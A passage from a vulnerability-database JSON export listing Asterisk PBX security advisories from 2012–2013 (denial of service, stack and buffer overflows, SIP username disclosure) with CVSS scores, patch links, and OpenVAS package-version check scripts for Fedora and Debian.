"sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:47:32", "description": "DoS conditions caused by resources exhaustion.", "edition": 2, "cvss3": {}, "published": "2013-01-05T00:00:00", "type": "securityvulns", "title": "Asterisk security vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2013-01-05T00:00:00", "id": "SECURITYVULNS:VULN:12811", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12811", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:46", "description": "\r\n\r\n Asterisk Project Security Advisory - AST-2012-015\r\n\r\n Product Asterisk \r\n Summary Denial of Service Through Exploitation of Device \r\n State Caching \r\n Nature of Advisory Denial of Service \r\n Susceptibility Remote Unauthenticated Sessions \r\n Severity Critical \r\n Exploits Known None \r\n Reported On 26 July, 2012 \r\n Reported By Russell Bryant \r\n Posted On 2 January, 2013 \r\n Last Updated On January 2, 2013 \r\n Advisory Contact Matt Jordan <mjordan AT digium DOT com> \r\n CVE Name CVE-2012-5977 \r\n\r\n Description Asterisk maintains an internal cache for devices. 
The \r\n device state cache holds the state of each device known to \r\n Asterisk, such that consumers of device state information \r\n can query for the last known state for a particular device, \r\n even if it is not part of an active call. The concept of a \r\n device in Asterisk can include things that do not have a \r\n physical representation. One way that this currently occurs \r\n is when anonymous calls are allowed in Asterisk. A device \r\n is automatically created and stored in the cache for each \r\n anonymous call that occurs; this is possible in the SIP and \r\n IAX2 channel drivers and through channel drivers that \r\n utilize the res_jabber/res_xmpp resource modules (Gtalk, \r\n Jingle, and Motif). Attackers exploiting this vulnerability \r\n can attack an Asterisk system configured to allow anonymous \r\n calls by varying the source of the anonymous call, \r\n continually adding devices to the device state cache and \r\n consuming a system's resources. \r\n\r\n Resolution Channels that are not associated with a physical device are \r\n no longer stored in the device state cache. This affects \r\n Local, DAHDI, SIP and IAX2 channels, and any channel drivers \r\n built on the res_jabber/res_xmpp resource modules (Gtalk, \r\n Jingle, and Motif). 
\r\n\r\n Affected Versions\r\n Product Release Series \r\n Asterisk Open Source 1.8.x All Versions \r\n Asterisk Open Source 10.x All Versions \r\n Asterisk Open Source 11.x All Versions \r\n Certified Asterisk 1.8.11 All Versions \r\n Asterisk Digiumphones 10.x-digiumphones All Versions \r\n\r\n Corrected In\r\n Product Release \r\n Asterisk Open Source 1.8.19.1, 10.11.1, 11.1.1 \r\n Certified Asterisk 1.8.11-cert10 \r\n Asterisk Digiumphones 10.11.1-digiumphones \r\n\r\n Patches \r\n SVN URL Revision \r\n http://downloads.asterisk.org/pub/security/AST-2012-015-1.8.diff Asterisk \r\n 1.8 \r\n http://downloads.asterisk.org/pub/security/AST-2012-015-10.diff Asterisk \r\n 10 \r\n http://downloads.asterisk.org/pub/security/AST-2012-015-11.diff Asterisk \r\n 11 \r\n\r\n Links https://issues.asterisk.org/jira/browse/ASTERISK-20175 \r\n\r\n Asterisk Project Security Advisories are posted at \r\n http://www.asterisk.org/security \r\n \r\n This document may be superseded by later versions; if so, the latest \r\n version will be posted at \r\n http://downloads.digium.com/pub/security/AST-2012-015.pdf and \r\n http://downloads.digium.com/pub/security/AST-2012-015.html \r\n\r\n Revision History\r\n Date Editor Revisions Made \r\n 19 November 2012 Matt Jordan Initial Draft \r\n\r\n Asterisk Project Security Advisory - AST-2012-015\r\n Copyright (c) 2012 Digium, Inc. 
All Rights Reserved.\r\n Permission is hereby granted to distribute and publish this advisory in its\r\n original, unaltered form.\r\n", "edition": 1, "cvss3": {}, "published": "2013-01-05T00:00:00", "title": "AST-2012-015: Denial of Service Through Exploitation of Device State Caching", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5977"], "modified": "2013-01-05T00:00:00", "id": "SECURITYVULNS:DOC:28928", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28928", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:46", "description": "\r\n\r\n Asterisk Project Security Advisory - AST-2012-014\r\n\r\n Product Asterisk \r\n Summary Crashes due to large stack allocations when using \r\n TCP \r\n Nature of Advisory Stack Overflow \r\n Susceptibility Remote Unauthenticated Sessions (SIP) \r\n \r\n Remote Authenticated Sessions (XMPP, HTTP) \r\n Severity Critical \r\n Exploits Known No \r\n Reported On 7 November, 2012 \r\n Reported By Walter Doekes \r\n Posted On 2 January, 2013 \r\n Last Updated On January 2, 2013 \r\n Advisory Contact Mark Michelson <mmichelson AT digium DOT com> \r\n CVE Name CVE-2012-5976 \r\n\r\n Description Asterisk has several places where messages received over \r\n various network transports may be copied in a single stack \r\n allocation. 
In the case of TCP, since multiple packets in a \r\n stream may be concatenated together, this can lead to large \r\n allocations that overflow the stack. \r\n \r\n In the case of SIP, it is possible to do this before a \r\n session is established. Keep in mind that SIP over UDP is \r\n not affected by this vulnerability. \r\n \r\n With HTTP and XMPP, a session must first be established \r\n before the vulnerability may be exploited. The XMPP \r\n vulnerability exists both in the res_jabber.so module in \r\n Asterisk 1.8, 10, and 11 as well as the res_xmpp.so module \r\n in Asterisk 11. \r\n\r\n Resolution Stack allocations when using TCP have either been eliminated \r\n in favor of heap allocations or have had an upper bound \r\n placed on them to ensure that the stack will not overflow. \r\n \r\n For SIP, the allocation now has an upper limit. \r\n \r\n For HTTP, the allocation is now a heap allocation instead of \r\n a stack allocation. \r\n \r\n For XMPP, the allocation has been eliminated since it was \r\n unnecessary. 
\r\n\r\n Affected Versions\r\n Product Release Series \r\n Asterisk Open Source 1.8.x All versions \r\n Asterisk Open Source 10.x All versions \r\n Asterisk Open Source 11.x All versions \r\n Certified Asterisk 1.8.11 SIP: unaffected \r\n \r\n HTTP and XMPP: All versions \r\n Asterisk Digiumphones 10.x-digiumphones All versions \r\n\r\n Corrected In\r\n Product Release \r\n Asterisk Open Source 1.8.19.1, 10.11.1, 11.1.1 \r\n Certified Asterisk 1.8.11-cert10 \r\n Asterisk Digiumphones 10.11.1-digiumphones \r\n\r\n Patches \r\n SVN URL Revision \r\n http://downloads.asterisk.org/pub/security/AST-2012-014-1.8.diff Asterisk \r\n 1.8 \r\n http://downloads.asterisk.org/pub/security/AST-2012-014-10.diff Asterisk \r\n 10 \r\n http://downloads.asterisk.org/pub/security/AST-2012-014-11.diff Asterisk \r\n 11 \r\n\r\n Links https://issues.asterisk.org/jira/browse/ASTERISK-20658 \r\n\r\n Asterisk Project Security Advisories are posted at \r\n http://www.asterisk.org/security \r\n \r\n This document may be superseded by later versions; if so, the latest \r\n version will be posted at \r\n http://downloads.digium.com/pub/security/AST-2012-014.pdf and \r\n http://downloads.digium.com/pub/security/AST-2012-014.html \r\n\r\n Revision History\r\n Date Editor Revisions Made \r\n 19 November, 2012 Mark Michelson Initial Draft \r\n 02 January, 2013 Matt Jordan Removed ABE from affected products \r\n\r\n Asterisk Project Security Advisory - AST-2012-014\r\n Copyright (c) 2012 Digium, Inc. 
All Rights Reserved.\r\n Permission is hereby granted to distribute and publish this advisory in its\r\n original, unaltered form.\r\n", "edition": 1, "cvss3": {}, "published": "2013-01-05T00:00:00", "title": "AST-2012-014: Crashes due to large stack allocations when using TCP", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976"], "modified": "2013-01-05T00:00:00", "id": "SECURITYVULNS:DOC:28927", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28927", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:47", "description": "\r\n\r\n Asterisk Project Security Advisory - AST-2013-001\r\n\r\n Product Asterisk \r\n Summary Buffer Overflow Exploit Through SIP SDP Header \r\n Nature of Advisory Exploitable Stack Buffer Overflow \r\n Susceptibility Remote Unauthenticated Sessions \r\n Severity Major \r\n Exploits Known No \r\n Reported On 6 January, 2013 \r\n Reported By Ulf Ha:rnhammar \r\n Posted On 27 March, 2013 \r\n Last Updated On March 27, 2013 \r\n Advisory Contact Jonathan Rose <jrose AT digium DOT com> \r\n CVE Name CVE-2013-2685 \r\n\r\n Description The format attribute resource for h264 video performs an \r\n unsafe read against a media attribute when parsing the SDP. \r\n The vulnerable parameter can be received as strings of an \r\n arbitrary length and Asterisk attempts to read them into \r\n limited buffer spaces without applying a limit to the \r\n number of characters read. 
If a message is formed \r\n improperly, this could lead to an attacker being able to \r\n execute arbitrary code remotely. \r\n\r\n Resolution Attempts to read string data into the buffers noted are now \r\n explicitly limited by the size of the buffers. \r\n\r\n Affected Versions\r\n Product Release Series \r\n Asterisk Open Source 11.x All Versions \r\n\r\n Corrected In \r\n Product Release \r\n Asterisk Open Source 11.2.2 \r\n\r\n Patches \r\n SVN URL Revision \r\n Http://downloads.asterisk.org/pub/security/AST-2013-001-11.diff Asterisk \r\n 11 \r\n\r\n Links https://issues.asterisk.org/jira/browse/ASTERISK-20901 \r\n\r\n Asterisk Project Security Advisories are posted at \r\n http://www.asterisk.org/security \r\n \r\n This document may be superseded by later versions; if so, the latest \r\n version will be posted at \r\n http://downloads.digium.com/pub/security/AST-2013-001.pdf and \r\n http://downloads.digium.com/pub/security/AST-2013-001.html \r\n\r\n Revision History\r\n Date Editor Revisions Made \r\n February 11, 2013 Jonathan Rose Initial Draft \r\n March 27, 2013 Matt Jordan CVE Added \r\n\r\n Asterisk Project Security Advisory - AST-2013-001\r\n Copyright (c) 2013 Digium, Inc. 
All Rights Reserved.\r\n Permission is hereby granted to distribute and publish this advisory in its\r\n original, unaltered form.\r\n", "edition": 1, "cvss3": {}, "published": "2013-04-01T00:00:00", "title": "AST-2013-001: Buffer Overflow Exploit Through SIP SDP Header", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2685"], "modified": "2013-04-01T00:00:00", "id": "SECURITYVULNS:DOC:29220", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29220", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:47", "description": "\r\n\r\n Asterisk Project Security Advisory - AST-2013-003\r\n\r\n Product Asterisk \r\n Summary Username disclosure in SIP channel driver \r\n Nature of Advisory Unauthorized data disclosure \r\n Susceptibility Remote Unauthenticated Sessions \r\n Severity Moderate \r\n Exploits Known No \r\n Reported On January 30, 2013 \r\n Reported By Walter Doekes, OSSO B.V. \r\n Posted On February 21, 2013 \r\n Last Updated On March 27, 2013 \r\n Advisory Contact Kinsey Moore <kmoore@digium.com> \r\n CVE Name CVE-2013-2264 \r\n\r\n Description When authenticating via SIP with alwaysauthreject enabled, \r\n allowguest disabled, and autocreatepeer disabled, Asterisk \r\n discloses whether a user exists for INVITE, SUBSCRIBE, and \r\n REGISTER transactions in multiple ways. 
\r\n \r\n This information was disclosed: \r\n \r\n * when a "407 Proxy Authentication Required" response was \r\n sent instead of "401 Unauthorized" response. \r\n \r\n * due to the presence or absence of additional tags at the \r\n end of "403 Forbidden" such as "(Bad auth)". \r\n \r\n * when a "401 Unauthorized" response was sent instead of \r\n "403 Forbidden" response after a retransmission. \r\n \r\n * when retransmissions were sent when a matching peer did \r\n not exist, but were not when a matching peer did exist. \r\n\r\n Resolution This issue can only be mitigated by upgrading to versions of \r\n Asterisk that contain the patch or applying the patch. \r\n\r\n Affected Versions\r\n Product Release Series \r\n Asterisk Open Source 1.8.x All Versions \r\n Asterisk Open Source 10.x All Versions \r\n Asterisk Open Source 11.x All Versions \r\n Certified Asterisk 1.8.15 All Versions \r\n Asterisk Business Edition C.3.x All Versions \r\n Asterisk Digiumphones 10.x-digiumphones All Versions \r\n\r\n Corrected In\r\n Product Release \r\n Asterisk Open Source 1.8.20.2, 10.12.2, 11.2.2 \r\n Asterisk Digiumphones 10.12.2-digiumphones \r\n Certified Asterisk 1.8.15-cert2 \r\n Asterisk Business Edition C.3.8.1 \r\n\r\n Patches \r\n SVN URL Revision \r\nhttp://downloads.asterisk.org/pub/security/AST-2013-003-1.8.diff Asterisk \r\n 1.8 \r\nhttp://downloads.asterisk.org/pub/security/AST-2013-003-10.diff Asterisk \r\n 10 \r\nhttp://downloads.asterisk.org/pub/security/AST-2013-003-11.diff Asterisk \r\n 11 \r\nhttp://downloads.asterisk.org/pub/security/AST-2013-003-1.8.15-cert.diff Certified \r\n Asterisk \r\n 1.8.15 \r\nhttp://downloads.asterisk.org/pub/security/AST-2013-003-C.3.diff Asterisk \r\n BE C.3 \r\n\r\n Links https://issues.asterisk.org/jira/browse/ASTERISK-21013 \r\n\r\n Asterisk Project Security Advisories are posted at \r\n http://www.asterisk.org/security \r\n \r\n This document may be superseded by later versions; if so, the latest \r\n version will be 
posted at \r\n http://downloads.digium.com/pub/security/AST-2013-003.pdf and \r\n http://downloads.digium.com/pub/security/AST-2013-003.html \r\n\r\n Revision History\r\n Date Editor Revisions Made \r\n 2013-02-20 Kinsey Moore Initial revision. \r\n 2013-02-27 Kinsey Moore Added Asterisk BE patch information. \r\n 2013-02-27 Kinsey Moore Corrected open source Asterisk versions. \r\n\r\n Asterisk Project Security Advisory - AST-2013-003\r\n Copyright (c) 2013 Digium, Inc. All Rights Reserved.\r\n Permission is hereby granted to distribute and publish this advisory in its\r\n original, unaltered form.\r\n", "edition": 1, "cvss3": {}, "published": "2013-04-01T00:00:00", "title": "AST-2013-003: Username disclosure in SIP channel driver", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264"], "modified": "2013-04-01T00:00:00", "id": "SECURITYVULNS:DOC:29222", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29222", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:47", "description": "\r\n\r\n Asterisk Project Security Advisory - AST-2013-002\r\n\r\n Product Asterisk \r\n Summary Denial of Service in HTTP server \r\n Nature of Advisory Denial of Service \r\n Susceptibility Remote Unauthenticated Sessions \r\n Severity Major \r\n Exploits Known None \r\n Reported On January 21, 2013 \r\n Reported By Christoph Hebeisen, TELUS Security Labs \r\n Posted On March 27, 2013 \r\n Last Updated On March 
27, 2013 \r\n Advisory Contact Mark Michelson <mmichelson AT digium DOT com> \r\n CVE Name CVE-2013-2686 \r\n\r\n Description AST-2012-014 [1], fixed in January of this year, contained a \r\n fix for Asterisk's HTTP server since it was susceptible to a \r\n remotely-triggered crash. \r\n \r\n The fix put in place fixed the possibility for the crash to be \r\n triggered, but a possible denial of service still exists if an \r\n attacker sends one or more HTTP POST requests with very large \r\n Content-Length values. \r\n \r\n [1] \r\n http://downloads.asterisk.org/pub/security/AST-2012-014.html \r\n\r\n Resolution Content-Length is now capped at a maximum value of 1024 \r\n bytes. Any attempt to send an HTTP POST with content-length \r\n greater than this cap will not result in any memory \r\n allocated. The POST will be responded to with an HTTP 413 \r\n "Request Entity Too Large" response. \r\n\r\n Affected Versions\r\n Product Release Series \r\n Asterisk Open Source 1.8.x 1.8.19.1, 1.8.20.0, 1.8.20.1 \r\n Asterisk Open Source 10.x 10.11.1, 10.12.0, 10.12.1 \r\n Asterisk Open Source 11.x 11.1.2, 11.2.0, 11.2.1 \r\n Certified Asterisk 1.8.15 1.8.15-cert1 \r\n Asterisk Digiumphones 10.x-digiumphones 10.11.1-digiumphones, \r\n 10.12.0-digiumphones, \r\n 10.12.1-digiumphones \r\n\r\n Corrected In\r\n Product Release \r\n Asterisk Open Source 1.8.20.2, 10.12.2, 11.2.2 \r\n Certified Asterisk 1.8.15-cert2 \r\n Asterisk Digiumphones 10.12.2-digiumphones \r\n\r\n Patches \r\n SVN URL Revision \r\nhttp://downloads.asterisk.org/pub/security/AST-2012-014-1.8.diff Asterisk \r\n 1.8 \r\nhttp://downloads.asterisk.org/pub/security/AST-2012-014-10.diff Asterisk \r\n 10 \r\nhttp://downloads.asterisk.org/pub/security/AST-2012-014-11.diff Asterisk \r\n 11 \r\nhttp://downloads.asterisk.org/pub/security/AST-2012-014-1.8.15-cert.diff Certified \r\n Asterisk \r\n 1.8.15 \r\n\r\n +------------------------------------------------------------------------+\r\n | Links | 
https://issues.asterisk.org/jira/browse/ASTERISK-20967 |\r\n | | http://telussecuritylabs.com/threats/show/TSL20130327-01 |\r\n +------------------------------------------------------------------------+\r\n\r\n Asterisk Project Security Advisories are posted at \r\n http://www.asterisk.org/security \r\n \r\n This document may be superseded by later versions; if so, the latest \r\n version will be posted at \r\n http://downloads.digium.com/pub/security/AST-2013-002.pdf and \r\n http://downloads.digium.com/pub/security/AST-2013-002.html \r\n\r\n Revision History\r\n Date Editor Revisions Made \r\n February 12, 2013 Mark Michelson Initial Draft \r\n March 27, 2013 Matt Jordan Updated CVE \r\n\r\n Asterisk Project Security Advisory - AST-2013-002\r\n Copyright (c) 2013 Digium, Inc. All Rights Reserved.\r\n Permission is hereby granted to distribute and publish this advisory in its\r\n original, unaltered form.\r\n", "edition": 1, "cvss3": {}, "published": "2013-04-01T00:00:00", "title": "AST-2013-002: Denial of Service in HTTP server", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2686"], "modified": "2013-04-01T00:00:00", "id": "SECURITYVULNS:DOC:29221", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29221", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-01-24T11:10:14", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2013-09-18T00:00:00", "type": 
"openvas", "title": "Fedora Update for asterisk FEDORA-2013-15567", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2018-01-24T00:00:00", "id": "OPENVAS:866888", "href": "http://plugins.openvas.org/nasl.php?oid=866888", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-15567\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866888);\n script_version(\"$Revision: 8509 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 07:57:46 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 10:07:05 +0530 (Wed, 18 Sep 2013)\");\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-15567\");\n\n tag_insight = \"Asterisk is a complete PBX in software. 
It runs on Linux and provides\nall of the features you would expect from a PBX and more. Asterisk\ndoes voice over IP in three protocols, and can interoperate with\nalmost all standards-based telephony equipment using relatively\ninexpensive hardware.\n\";\n\n tag_affected = \"asterisk on Fedora 18\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-15567\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115639.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.5.1~2.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:13", "description": "The remote host is missing an update for the 'asterisk' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2013-09-18T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-15567", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": 
"2019-03-15T00:00:00", "id": "OPENVAS:1361412562310866888", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866888", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-15567\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866888\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 10:07:05 +0530 (Wed, 18 Sep 2013)\");\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-15567\");\n\n\n script_tag(name:\"affected\", value:\"asterisk on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-15567\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115639.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.5.1~2.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:03", "description": "Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.", "cvss3": {}, "published": "2013-09-02T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2749-1 (asterisk - several vulnerabilities)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310892749", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892749", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2749.nasl 14276 2019-03-18 14:43:56Z cfischer $\n# Auto-generated from advisory DSA 2749-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 
2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892749\");\n script_version(\"$Revision: 14276 $\");\n script_cve_id(\"CVE-2013-5642\", \"CVE-2013-5641\");\n script_name(\"Debian Security Advisory DSA 2749-1 (asterisk - several vulnerabilities)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:43:56 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-02 00:00:00 +0200 (Mon, 02 Sep 2013)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", 